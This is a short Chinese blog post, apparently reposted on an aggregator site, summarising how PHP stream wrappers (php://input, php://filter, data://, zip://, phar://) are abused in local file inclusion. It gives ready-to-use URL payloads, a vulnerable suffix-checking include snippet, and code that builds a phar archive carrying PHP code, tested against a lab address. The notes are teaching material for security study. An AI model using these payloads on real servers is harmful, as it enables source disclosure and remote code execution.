php封装协议的利用

php封装协议的利用

作者: Yix1a | 来源:发表于2019-05-30 16:16 被阅读0次

利用php流input(接受POST过来的值)：
?file=php://input
(需要allow_url_include=On，详细→[http://php.net/manual/en/wrappers.php.php](http://php.net/manual/en/wrappers.php.php))
代码执行：
image
利用php流filter(过滤器,可以用来读取php文件内容,不需要开启allow_url_include)：
?file=php://filter/convert.base64-encode/resource=index.php
利用data URIs：
?file=[data://text/plain;base64,base64编码的payload](data://text/plain;base64,base64编码的payload)
(需要allow_url_include=On)
image
<?php phpinfo();,注意没有?>闭合

其他封装协议的利用

zip协议
http://php.net/manual/zh/wrappers.compression.php
php $include_file=$_GET[include_file]; if ( isset( $include_file ) && strtolower( substr( $include_file, -4 ) ) == ".php" ) { require( $include_file ); }
截取过来的后面4格字符,判断是不是php,如果是php才进行包含
image
协议原型：zip://archive.zip#dir/file.txt
注意url编码,因为这个#会和url协议中的#冲突
phar协议
phar是将php文件归档到一个文件包里面(我理解是类似与zip压缩包一样)
php <?php $p = new PharData(dirname(__FILE__).'/phartest.aaa', 0,'phartest',Phar::ZIP) ; $p->addFromString('testfile.txt', '<?php phpinfo();?>'); ?>
创建phar的时候要注意php.ini的参数,phar.readonly设置为off（本地测试的两个默认都是off）
然后通过包含协议访问：
http://192.168.227.128/other/lfi/ex1.php?f=phar://./phar/phartest.aaa/testfile.txt
image
此方法使用要php>5.3.0

相关文章

网友评论

本文标题：php封装协议的利用

本文链接：https://www.haomeiwen.com/subject/xibqtctx.html

延伸阅读

深度阅读

您也可以注册成为美文阅读网的作者，发表您的原创作品、分享您的心情！

栏目导航

热点阅读

关于我们|服务条款|联系我们|php封装协议的利用|投稿指南|网站地图|RSS订阅|排版工具|手机版

提供经典美文摘抄,优美散文欣赏,现代诗歌精选,短篇小说,心情随笔,表白情书范文,故事会在线阅读欣赏

Copyright © 2014-2023 Haomeiwen.com All Rights Reserved. 好美文阅读网版权所有

备案信息：桂公网安备 45052102000051号 · 桂ICP备13007215号-3

本站所收录作品、热点评论等信息部分来源互联网，目的只是为了系统归纳学习和传递资讯

所有作品版权归原创作者所有，与本站立场无关，如不慎侵犯了你的权益，请联系我们告知，我们将做删除处理！